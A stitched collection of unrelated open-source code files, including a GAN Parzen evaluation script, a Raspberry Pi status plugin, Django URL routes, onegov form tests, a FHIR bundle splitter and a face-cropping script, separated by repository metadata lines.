import matplotlib.pyplot as plt
from PIL import Image
from src.param_parse import parameter_parser
from src.dataset import load_test_data
opt = parameter_parser()
print(opt)
def log_mean_exp(a):
max_ = a.max(axis=1)
max2 = max_.reshape(max_.shape[0], 1)
return max_ + np.log(np.exp(a - max2).mean(1))
def mind_parzen(x, mu, sigma):
''' mind parzen '''
a = (x.reshape(x.shape[0], 1, x.shape[-1]) - mu.reshape(1, mu.shape[0], mu.shape[-1])) / sigma
a5 = -0.5 * (a ** 2).sum(2)
E = log_mean_exp(a5)
t4 = sigma * np.sqrt(np.pi * 2)
t5 = np.log(t4)
Z = mu.shape[1] * t5
return E - Z
def get_nll(x, samples, sigma, batch_size=10):
'''get_nll'''
inds = range(x.shape[0])
inds = list(inds)
n_batches = int(np.ceil(float(len(inds)) / batch_size))
times = []
nlls = np.array([]).astype(np.float32)
for l in range(n_batches):
begin = time.time()
nll = mind_parzen(x[inds[l::n_batches]], samples, sigma)
end = time.time()
times.append(end - begin)
nlls = np.concatenate((nlls, nll))
if l % 10 == 0:
print(l, np.mean(times), nlls.mean())
return nlls
def cross_validate_sigma(samples, data, sigmas, batch_size):
'''cross_validate_sigma'''
lls = np.array([]).astype(np.float32)
for sigma in sigmas:
print(sigma)
tmp = get_nll(data, samples, sigma, batch_size=batch_size)
tmp = tmp.mean()
tmp = tmp.reshape(1, 1)
tmp = tmp.squeeze()
lls = np.concatenate((lls, tmp))
gc.collect()
ind = lls.argmax()
return sigmas[ind]
def get_test():
dataset = load_test_data().astype("float32")
image = dataset
image = image.reshape(image.shape[0], 784)
return image
def parzen(samples):
'''parzen'''
shape = samples.shape
samples = samples.reshape(shape[0], -1)
sigma = 0.16681005372000587
print("Using Sigma: {}".format(sigma))
gc.collect()
test_data = get_test()
test_data = test_data / 255
ll = get_nll(test_data, samples, sigma, batch_size=opt.batch_size_t)
se = ll.std() / np.sqrt(test_data.shape[0])
print("Log-Likelihood of test set = {}, se: {}".format(ll.mean(), se))
return ll.mean(), se
test_latent_code_parzen = np.random.normal(size=(10000, opt.latent_dim)).astype(np.float32)
def save_imgs2(gen_imgs, idx):
'''save images'''
index = gen_imgs < 1
gen_imgs[index] = 0
index = gen_imgs > 250
gen_imgs[index] = 255
for k in range(gen_imgs.shape[0]):
plt.subplot(5, 20, k + 1)
plt.imshow(gen_imgs[k, 0, :, :], cmap="gray")
plt.axis("off")
plt.savefig("./images2/{}.png".format(idx))
if __name__ == "__main__":
args_opt = parameter_parser()
imageSize = args_opt.img_size
nc = 1
f_name = os.path.join("ascend310_infer/result_files", 'gan_bs_0.bin')
fake = np.fromfile(f_name, np.float32).reshape(10000, nc, imageSize, imageSize)
fake = np.multiply(fake, 0.5*255)
fake = np.add(fake, 0.5*255)
for j in range(10000):
img_pil = fake[j, ...].reshape(1, nc, imageSize, imageSize)
img_pil = img_pil[0].astype(np.uint8)
img_pil = img_pil[0].astype(np.uint8)
img_pil = Image.fromarray(img_pil)
img_pil.save(os.path.join("images", "generated_%02d.png" % j))
print("Generate images success!")
size = 28
imag = []
for i in range(10000):
img_temp = mpimg.imread(os.path.join("images", "generated_%02d.png" % i))
img_temp = img_temp.reshape(1, size, size)
imag.append(img_temp)
imag = np.array(imag)
samples1 = imag
mean_ll, se_ll = parzen(samples1)
print("Log-Likelihood of test set = {}, se: {}".format(mean_ll, se_ll))
| 32.561151 | 98 | 0.62616 |
c9b0ca723a1f361024c4f7f2651ae0d1f9d76c92
| 308 |
pyde
|
Python
|
sketches/with/with.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/with/with.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/with/with.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
# with-Statement
def setup():
size(400, 400)
background(255)
def draw():
fill(color(255, 153, 0))
ellipse(100, 100, 50, 50)
with pushStyle():
fill(color(255, 51, 51))
strokeWeight(5)
ellipse(200, 200, 50, 50)
ellipse(300, 300, 50, 50)
| 17.111111 | 34 | 0.519481 |
c9b5b4f61fb3a1cbbcb2e6cc2503783afb2992a1
| 2,107 |
py
|
Python
|
.xiaobu/custom/RaspberryPiStatus.py
|
hanyanze/FS_AILPB
|
7756551cf926aa6296ec851dd696c97d56e06bca
|
[
"Apache-2.0"
] | 1 |
2020-07-16T02:52:47.000Z
|
2020-07-16T02:52:47.000Z
|
.xiaobu/custom/RaspberryPiStatus.py
|
hanyanze/FS_AILPB
|
7756551cf926aa6296ec851dd696c97d56e06bca
|
[
"Apache-2.0"
] | null | null | null |
.xiaobu/custom/RaspberryPiStatus.py
|
hanyanze/FS_AILPB
|
7756551cf926aa6296ec851dd696c97d56e06bca
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8-*-
# 树莓派状态插件
import os
from robot import logging
from robot.sdk.AbstractPlugin import AbstractPlugin
logger = logging.getLogger(__name__)
class Plugin(AbstractPlugin):
SLUG = "pi_status"
def getCPUtemperature(self):
result = 0.0
try:
tempFile = open("/sys/class/thermal/thermal_zone0/temp")
res = tempFile.read()
result = float(res) / 1000
except:
self.say(u'抱歉,无法获取处理器温度', cache=True)
return result
def getRAMinfo(self):
p = os.popen('free')
i = 0
while 1:
i = i + 1
line = p.readline()
if i == 2:
return (line.split()[1:4])
def getDiskSpace(self):
p = os.popen("df -h /")
i = 0
while 1:
i = i +1
line = p.readline()
if i == 2:
return (line.split()[1:5])
def getPiStatus(self):
result = {'cpu_tmp': 0.0,
'ram_total': 0, 'ram_used': 0, 'ram_percentage': 0,
'disk_total': '0.0', 'disk_used': '0.0','disk_percentage': 0}
result['cpu_tmp'] = self.getCPUtemperature()
ram_stats = self.getRAMinfo()
result['ram_total'] = int(ram_stats[0]) / 1024
result['ram_used'] = int(ram_stats[1]) / 1024
result['ram_percentage'] = int(result['ram_used'] * 100 / result['ram_total'])
disk_stats = self.getDiskSpace()
result['disk_total'] = disk_stats[0]
result['disk_used'] = disk_stats[1]
result['disk_percentage'] = disk_stats[3].split('%')[0]
return result
def handle(self, text, parsed):
try:
status = self.getPiStatus()
self.say(u'处理器温度' + str(status['cpu_tmp']) + u'度,内存使用百分之' + str(status['ram_percentage']) + u',存储使用百分之' + str(status['disk_percentage']))
except Exception as e:
logger.error(e)
self.say(u'抱歉,我没有获取到树莓派状态', cache=True)
def isValid(self, text, parsed):
return any(word in text for word in [u"树莓派状态", u"状态", u"运行状态"])
| 31.447761 | 149 | 0.542952 |
6dc9002e1c8726bf117e98e28fc6f0d87fd91549
| 586 |
py
|
Python
|
src/onegov/core/orm/mixins/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/orm/mixins/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/orm/mixins/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm.mixins.content import content_property
from onegov.core.orm.mixins.content import ContentMixin
from onegov.core.orm.mixins.content import data_property
from onegov.core.orm.mixins.content import dict_property
from onegov.core.orm.mixins.content import meta_property
from onegov.core.orm.mixins.publication import UTCPublicationMixin
from onegov.core.orm.mixins.timestamp import TimestampMixin
__all__ = [
'content_property',
'ContentMixin',
'data_property',
'dict_property',
'meta_property',
'TimestampMixin',
'UTCPublicationMixin',
]
| 30.842105 | 66 | 0.793515 |
116103b6c11d54ffdec248ffae2443f3d84115f5
| 385 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade072.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade072.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade072.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Install a package with a missing dependency (nodeps)"
p = pmpkg("dummy")
p.files = ["bin/dummy",
"usr/man/man1/dummy.1"]
p.depends = ["dep1"]
self.addpkg(p)
self.args = "-Udd %s" % p.filename()
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_EXIST=dummy")
self.addrule("PKG_DEPENDS=dummy|dep1")
for f in p.files:
self.addrule("FILE_EXIST=%s" % f)
| 24.0625 | 73 | 0.675325 |
3a2d19ae806ea485e094c3010253894ae8f262a3
| 231 |
py
|
Python
|
tests/web.adblockplus.org/data/dataDonationPages.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2016-01-29T18:05:29.000Z
|
2021-10-06T04:21:55.000Z
|
tests/web.adblockplus.org/data/dataDonationPages.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2015-04-06T19:03:32.000Z
|
2019-05-28T13:34:55.000Z
|
tests/web.adblockplus.org/data/dataDonationPages.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 18 |
2015-04-06T17:42:31.000Z
|
2021-10-06T04:26:29.000Z
|
TEST_DATA = [(
'donation_page',
'https://adblockplus.org/donate',
), (
'update_page',
'https://new.adblockplus.org/update',
), (
'first_run_page',
'https://welcome.adblockplus.org/installed'
)]
| 19.25 | 49 | 0.584416 |
c9834d3a9fd2f27a14bef81edff915058e97365c
| 865 |
py
|
Python
|
cktsim/sim/urls.py
|
Rajarshi07/cktsim
|
35f85a5240b940bfd0c0f5fb15cf59da57f92587
|
[
"MIT"
] | null | null | null |
cktsim/sim/urls.py
|
Rajarshi07/cktsim
|
35f85a5240b940bfd0c0f5fb15cf59da57f92587
|
[
"MIT"
] | null | null | null |
cktsim/sim/urls.py
|
Rajarshi07/cktsim
|
35f85a5240b940bfd0c0f5fb15cf59da57f92587
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('allckts/', views.allckts, name='allckts'),
path('adder/hadd/', views.hadd, name='halfadder'),
path('adder/fadd/', views.fadd, name='fulladder'),
path('subtractor/hsub/', views.hsub, name='halfsubstractor'),
path('subtractor/fsub/', views.fsub, name='fullsubstractor'),
path('gate/and/', views.gate_and ,name='gate_and'),
path('gate/or/', views.gate_or ,name='gate_or'),
path('gate/xor/', views.gate_xor ,name='gate_xor'),
path('gate/xnor/', views.gate_xnor ,name='gate_xnor'),
path('gate/nand/', views.gate_nand ,name='gate_nand'),
path('gate/nor/', views.gate_nor ,name='gate_nor'),
path('gate/not/', views.gate_not ,name='gate_not'),
path('comparator/comp1bit/',views.comp1bit, name='comp1bit'),
]
| 43.25 | 65 | 0.660116 |
a3293426b4a0b24e55bbd137577dd253291f5281
| 1,563 |
py
|
Python
|
doc/fb_memoir/python/induc.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/induc.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/induc.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | 1 |
2020-03-08T01:50:58.000Z
|
2020-03-08T01:50:58.000Z
|
#!/usr/bin/env python3
import numpy as np
# Calculate Inductance of Rectangle
a = 10 # length
b = 3
#b = np.sqrt(2*5)
#bInner = 2
#bOuter = 5
d = np.sqrt(a**2 + b**2) # diagonal
s = 4e-6 # section surface of wire
rho = np.sqrt(s/np.pi) # radius of wire
mu0 = 4*np.pi*1e-7 # electromagnetic constant
# Terms for Inductance Calculation
A = (a+b)*np.log(2*a*b/rho)
B = a*np.log(a+d)
C = b*np.log(b+d)
D = 7/4 * (a+b)
E = 2*(d+rho)
# Inductance
Lrect = mu0/np.pi * (A - B - C - D + E)
print("Panel Array Rectangle Inductance: ", Lrect*1e6, "muH")
# Calculate Inductance of Two-Wire Setup
dw = 20e-3 # distance between wires
l = 20 # length of single wire
Lwire = mu0*l/np.pi * (np.log(dw/rho)+1/4)
print("Dual-Wire Inductance: ", Lwire*1e6, "muH")
# Calculate Inductance of PV Panel Wiring
# Middle wires
lPV = 1.5
dPV = 125e-3
LPVmiddle = mu0*lPV/(2*np.pi) * (np.log(dPV/rho) + 1/4-np.log(4/3))
LPVouter = mu0*lPV/(2*np.pi) * (np.log(dPV/rho) + 1/4-np.log(3/2))
LPV2nd = mu0*lPV/(2*np.pi) * (np.log(dPV/rho) + 1/4-np.log(8/3))
#print(LPVmiddle)
#print(LPV2nd)
#print(LPVouter)
LPVPanel = (LPVmiddle + LPVouter + LPV2nd)*2*20
print("Total Panel Wiring Inductance: ", LPVPanel*1e6, "muH")
print("Total Inductance of DC Line: ", (Lrect + Lwire + LPVPanel)*1e6, "muH");
# Inductance of Piece of Wire interacting with Signal Coil
lInteract = 10e-3
muCopper = 1.256629e-6
Linteraction = mu0/(2*np.pi)*(np.log(2*lInteract/rho)-1+muCopper/4)
print("Interactive Inductance:", Linteraction, "muH")
| 26.948276 | 78 | 0.634037 |
28596eea00f6e54a8cb03d3c432442a23adfaaa3
| 267 |
py
|
Python
|
mqtt/mqtt_publish.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
# Notwendige Bibliothek installieren:
# pip3 install paho-mqtt
import paho.mqtt.publish as publish
# veröffentliche eine neue Nachricht unter dem angegebenen Thema
publish.single("test/topic", "nachricht", hostname="192.168.24.132")
| 20.538462 | 68 | 0.756554 |
6c7c205548401d130df6ab07cd60084e4937498e
| 1,548 |
py
|
Python
|
timing.py
|
timwuu/SokobanSolver
|
ae6d73516efa70fbf56ed4ca920b5ddc427d095d
|
[
"MIT"
] | null | null | null |
timing.py
|
timwuu/SokobanSolver
|
ae6d73516efa70fbf56ed4ca920b5ddc427d095d
|
[
"MIT"
] | null | null | null |
timing.py
|
timwuu/SokobanSolver
|
ae6d73516efa70fbf56ed4ca920b5ddc427d095d
|
[
"MIT"
] | null | null | null |
import numpy as np
import hashlib
import datetime
MAX_STEP_COUNT_LST_SIZE= 256
g_lst_1 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='i4')
g_lst_2 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='i4')
g_lst_3 = np.empty((MAX_STEP_COUNT_LST_SIZE*2),dtype='u2')
g_lst_4 = np.empty((MAX_STEP_COUNT_LST_SIZE*2),dtype='u2')
def Loop():
lst_a, lst_b = g_lst_3, g_lst_4
a=3
b=4
len=0
x,y=4,6
player=[2,3]
box = [[3,3],[3,4],[3,5],[4,4],[4,5]]
npbox = np.array( box, dtype='b')
for i in range(0,10000):
for k in range(0,MAX_STEP_COUNT_LST_SIZE):
m = hashlib.sha256()
m.update( bytes(player))
m.update( npbox.tobytes())
m.hexdigest()
pass
start_time = datetime.datetime.now()
Loop()
diff_time = datetime.datetime.now() - start_time
print( "Time Used: {}".format(diff_time))
# 2.8~2,9 per 10,000^2
# a,b = b,a
# lst_a, lst_b = lst_b, lst_a
# 'u2' np.array
# 1.6~1.7 per 10,000*256
# lst_a[k]=[x-1,y]
# k += 1
# 0.26~0.28 per 10,000*256
# lst_a.append([x-1,y])
# 0.18~0.19 per 10,000*256
# lst_a[k]=[x-1,y]
# 0.43~0.47 per 10,000*256
# lst_a[k],lst_b[k]=x-1,y
# 6.66 per 10,000*256
# m = hashlib.sha256()
# m.update( bytes(player))
# for elem in box:
# m.update( bytes(elem))
# m.hexdigest()
# 3.6 per 10,000*256
# m = hashlib.sha256()
# m.update( bytes(player))
# m.update( npbox.tobytes())
# m.hexdigest()
| 18.878049 | 59 | 0.560724 |
dd5f0a9258c42e65bdea33af16411fb664614a02
| 3,401 |
py
|
Python
|
21-fs-ias-lec/13-RaptorCode/src/demo.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
21-fs-ias-lec/13-RaptorCode/src/demo.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
21-fs-ias-lec/13-RaptorCode/src/demo.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
from numpy import random # only used to simulate data loss
from decoder import Decoder # necessary for the functionality
from encoder import Encoder # necessary for the functionality
from utils import NUMBER_OF_ENCODED_BITS # only used for statistic
# showcase steering elements:
STOP_ENCODER_ON_DECODING = True # this variable sets whether the encoder stops generating packages once the decoding
# was successful. (This can in IRL only occur, when the sender can be informed)
HAS_PACKAGE_LOSS = False # sets whether the loss of packages is simulated
PROBABILITY_OF_LOSS = 0.5 # Probability that a package is lost (when package loss is activated)
PRINT_STATISTICS = True # this variable sets, whether the statistic will be printed or not
# necessary variables
encoder = Encoder(500) # the Number set how many packages the encoder maximally generates (optional)
decoder = Decoder()
# the following is an example of transmitted data. (Since it takes bytes the string has to be encoded).
# the input has to have a multiple length of 32 bits (4 bytes) or it will not be processed
exampleTransmissionData = "Lorem ipsum dolor sit amet, consectetur adipisici elit, sed diam nonumy.".encode('utf8')
# variables for the statistic (not relevant)
numberOfPackages = 0 # counts how many packages were sent for every decoded Data
temp_numberOfPackages = 0 # help variable for same task
numberOfDecodedInformation = 0 # counts number of successfully decoding data
# demo code
for package in encoder.encode(exampleTransmissionData): # the encode function of the decoder acts as a generator
# which yields utils.TransmissionPackage.
temp_numberOfPackages += 1 # counter for statistic (not relevant)
# simulation of package loss
if random.random() < PROBABILITY_OF_LOSS:
continue
txt = decoder.decode(package) # decoder.decode(TransmissionPackage) tries to decode the information. If there is
# not enough information it returns None, else it returns the decoded bytes
if txt is not None: # check whether the decoder was successful
numberOfDecodedInformation += 1 # counter for statistics (not relevant)
numberOfPackages += temp_numberOfPackages # counter for statistics (not relevant)
temp_numberOfPackages = 0 # counter for statistics (not relevant)
print(numberOfDecodedInformation, txt.decode('utf8')) # the decoded data gets printed (has to be decoded,
# since its bytes and we want a string.
if STOP_ENCODER_ON_DECODING: # steering structure for demo (not relevant)
break
# statistics
if numberOfDecodedInformation == 0: # check if there was a successful decoding
print("Ran out of packages before first successful decoding!") # if not print that it wasn't successful
elif PRINT_STATISTICS: # also check if printing of the statistic is activated
# calculate how many chunks there are for the data
numberOfChunks = int(len(exampleTransmissionData) / (NUMBER_OF_ENCODED_BITS / 8))
print("Number of Chunks:\t\t" + str(numberOfChunks)) # print that number
# number of encoded packages for sending
print("avg. Number of Packages Needed:\t" + str(numberOfPackages / numberOfDecodedInformation))
# number of encoded packages for sending per chunk
print("avg. per chunk:\t\t\t" + str(int(numberOfPackages / numberOfChunks) / numberOfDecodedInformation))
| 57.644068 | 117 | 0.7586 |
b0d1c34511e3f9a65f226a452c09abc99a99d5b5
| 4,448 |
py
|
Python
|
tests/onegov/election_day/forms/test_notification_form.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/forms/test_notification_form.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/forms/test_notification_form.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from datetime import date
from onegov.ballot import Election
from onegov.ballot import ProporzElection
from onegov.ballot import Vote
from onegov.election_day.forms import TriggerNotificationForm
from onegov.election_day.forms import TriggerNotificationsForm
from tests.onegov.election_day.common import DummyPostData
from tests.onegov.election_day.common import DummyRequest
def test_notification_form():
form = TriggerNotificationForm()
form.request = DummyRequest()
form.on_request()
assert form.notifications.choices == []
assert not form.validate()
form.request.app.principal.email_notification = True
form.on_request()
assert form.notifications.choices == [('email', 'Email')]
assert 'email' in form.notifications.default
form.request.app.principal.sms_notification = 'http://example.com'
form.on_request()
assert form.notifications.choices == [('email', 'Email'), ('sms', 'SMS')]
assert 'email' in form.notifications.default
assert 'sms' in form.notifications.default
form.request.app.principal.webhooks = {'http://abc.com/1': None}
form.on_request()
assert form.notifications.choices == [
('email', 'Email'), ('sms', 'SMS'), ('webhooks', 'Webhooks')
]
assert form.notifications.data == ['email', 'sms', 'webhooks']
assert 'sms' in form.notifications.default
assert 'webhooks' in form.notifications.default
def test_notifications_form(session):
form = TriggerNotificationsForm()
form.request = DummyRequest(session=session)
form.on_request()
assert form.notifications.choices == []
assert form.elections.choices == []
assert form.votes.choices == []
assert form.latest_date(session) is None
assert not form.validate()
# Enable notification
form.request.app.principal.email_notification = True
form.request.app.principal.sms_notification = 'http://example.com'
form.request.app.principal.webhooks = {'http://abc.com/1': None}
# Add votes and elections
session.add(
Vote(
title='Vote 1',
shortcode='f',
domain='canton',
date=date(2015, 1, 1)
)
)
session.add(
Vote(
title='Vote 2',
shortcode='e',
domain='federation',
date=date(2015, 2, 1)
)
)
session.add(
Vote(
title='Vote 3',
shortcode='d',
domain='canton',
date=date(2015, 2, 1)
)
)
session.add(
Election(
title='Majorz Election 1',
shortcode='c',
domain='canton',
date=date(2015, 2, 1)
)
)
session.add(
Election(
title='Majorz Election 2',
shortcode='b',
domain='region',
date=date(2015, 2, 1)
)
)
session.add(
ProporzElection(
title='Proporz Election',
shortcode='a',
domain='canton',
date=date(2015, 1, 10)
)
)
session.flush()
# Test on_request
form.on_request()
assert form.notifications.choices == [
('email', 'Email'), ('sms', 'SMS'), ('webhooks', 'Webhooks')
]
assert form.notifications.data == ['email', 'sms', 'webhooks']
assert 'email' in form.notifications.default
assert 'sms' in form.notifications.default
assert 'webhooks' in form.notifications.default
assert form.latest_date(session) == date(2015, 2, 1)
assert form.votes.choices == [
('vote-3', 'Vote 3'),
('vote-2', 'Vote 2')
]
assert form.elections.choices == [
('majorz-election-2', 'Majorz Election 2'),
('majorz-election-1', 'Majorz Election 1')
]
assert form.vote_models(session) == []
assert form.election_models(session) == []
# Test submit
form = TriggerNotificationsForm(
DummyPostData({
'notifications': ['email'],
'votes': ['vote-3', 'vote-2'],
'elections': ['majorz-election-2']
})
)
form.request = DummyRequest(session=session)
form.request.app.principal.email_notification = True
form.on_request()
assert form.validate()
assert [vote.id for vote in form.vote_models(session)] == [
'vote-3',
'vote-2'
]
assert [election.id for election in form.election_models(session)] == [
'majorz-election-2',
]
| 30.675862 | 77 | 0.607239 |
af873620f2e0464a704d2cf26efb89cbe6bc0821
| 489 |
py
|
Python
|
ISTp/2014/korsakov_a_a/task_2_34.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
ISTp/2014/korsakov_a_a/task_2_34.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
ISTp/2014/korsakov_a_a/task_2_34.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 2. Вариант 34
# Напишите программу, которая будет выводить на экран наиболее понравившееся
# вам высказывание, автором которого является Платон. Не забудьте о том,
# что автор должен быть упомянут на отдельной строке.
# Korsakov A.A.
# 31.03.2016
print ('\nНикто не знает, что такое смерть и не есть ли она величайшее для человека добро. И однако, все ее страшатся как бы в сознании, что она - величайшее зло.')
print ('\n\t\t Платон')
input ('\n\n Нажмите Enter для выхода')
| 44.454545 | 164 | 0.748466 |
bb960271e706222acdc3d1eee56653d1674f3452
| 2,392 |
py
|
Python
|
test_data/split_and_load_bundles.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
test_data/split_and_load_bundles.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
test_data/split_and_load_bundles.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
##### DO NOT USE REFERENCES ARE NOT PRESERVED #####
##### times out on HAPI test server so split into thirds and save.
from fhirclient.r4models import (
bundle,
)
from json import loads, dumps
from requests import get, post, put
from datetime import datetime, date, timedelta
from pathlib import Path
from pprint import pprint, pformat
test_server = 'http://hapi.fhir.org/baseR4'
headers = {
'Accept':'application/fhir+json',
'Content-Type':'application/fhir+json',
#"Authorization": 'Bearer 0QLWt38GQHyYxrcHuG40mw==',# TEMP meditech token remove and fix if this works
}
base_path = '/Users/ehaas/Documents/FHIR/Davinci-Alerts/2020_09_hl7_connectathon/Synthea_Alert_Test_Data'
file_type = 'fhir'
file_size = '100Patients'
file = 'admit_notify-100r1.json'
mypath = Path() / base_path / file_type / file_size
myfile = mypath / file
print(f'My Path to Synthea Data a FHIR Bundle is {myfile}')
print()
ref_map = {
'Location': ('managingOrganization' , 'Organization'),
}
r_types = 'Patient','Practitioner','Organization','Location','Coverage','Encounter','Questionnaire','QuestionnaireResponse','Group'
for type in r_types:
my_b = bundle.Bundle(loads(myfile.read_text()))
print(f'Making the {type} Bundle')
pop_list = [i for i,e in enumerate(my_b.entry) if e.resource.resource_type != type]
[my_b.entry.pop(i) for i in reversed(pop_list)]
if type in list(ref_map.keys()):
element = ref_map[type][0]
old_ref = gettattr((getattr(type,element),'reference'))
new_ref = old_ref.replace('urd:uuid:',ref_map[type][1])
setattr((getattr(type,element),'reference', new_ref)
print(type, len(my_b.entry) )
if my_b.entry:
out_file = f'argo-pl100r1-{type.lower()}-transaction-bundle.json'
print(f'save {type} Bundle as argo-pl100r1-{type.lower()}-transaction-bundle.json' )
my_out_file = mypath / out_file
my_out_file.write_text(dumps(my_b.as_json()))
print('...saved!')
#load to ref server
for f in mypath.iterdir():
if f.name.startswith('argo-pl100r1'):
with post(test_server,headers = headers, data=f.read_text() ) as r:
print(f'posting {str(f)} to {test_server}...')
print(r.status_code)
if r.status_code > 200:
print(dumps(r.json() ,indent=4))
| 35.176471 | 131 | 0.663043 |
a524560897bffe8d9900040b114bdee8d4a3485b
| 1,957 |
py
|
Python
|
test_protocol/lfw/face_cropper/crop_calfw_by_arcface.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 1,329 |
2021-01-13T07:06:30.000Z
|
2022-03-31T07:23:39.000Z
|
test_protocol/lfw/face_cropper/crop_calfw_by_arcface.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 115 |
2021-01-13T10:42:57.000Z
|
2022-03-28T03:57:52.000Z
|
test_protocol/lfw/face_cropper/crop_calfw_by_arcface.py
|
weihaoxie/FaceX-Zoo
|
db0b087e4f4d28152e172d6c8d3767a8870733b4
|
[
"Apache-2.0"
] | 351 |
2021-01-13T07:21:00.000Z
|
2022-03-29T14:11:39.000Z
|
"""
@author: Jun Wang
@date: 20201012
@contact: [email protected]
"""
import os
import sys
import math
import multiprocessing
import cv2
sys.path.append('/export/home/wangjun492/wj_armory/faceX-Zoo/face_sdk')
from core.image_cropper.arcface_face_recognition.FaceRecImageCropper import FaceRecImageCropper
def crop_calfw(calfw_root, calfw_lmk_root, target_folder):
face_cropper = FaceRecImageCropper()
file_list = os.listdir(calfw_root)
for cur_file in file_list:
if cur_file.endswith('.jpg'):
cur_file_path = os.path.join(calfw_root, cur_file)
cur_image = cv2.imread(cur_file_path)
face_lms = []
cur_file_name = os.path.splitext(cur_file)[0]
cur_lms_file_name = cur_file_name + '_5loc_attri.txt'
cur_lms_file_path = os.path.join(calfw_lmk_root, cur_lms_file_name)
cur_lms_buf = open(cur_lms_file_path)
line = cur_lms_buf.readline().strip()
while line:
line_strs = line.split(' ')
face_lms.extend(line_strs)
line = cur_lms_buf.readline().strip()
face_lms = [float(s) for s in face_lms]
face_lms = [int(num) for num in face_lms]
cur_cropped_image = face_cropper.crop_image_by_mat(cur_image, face_lms)
target_path = os.path.join(target_folder, cur_file)
cv2.imwrite(target_path, cur_cropped_image)
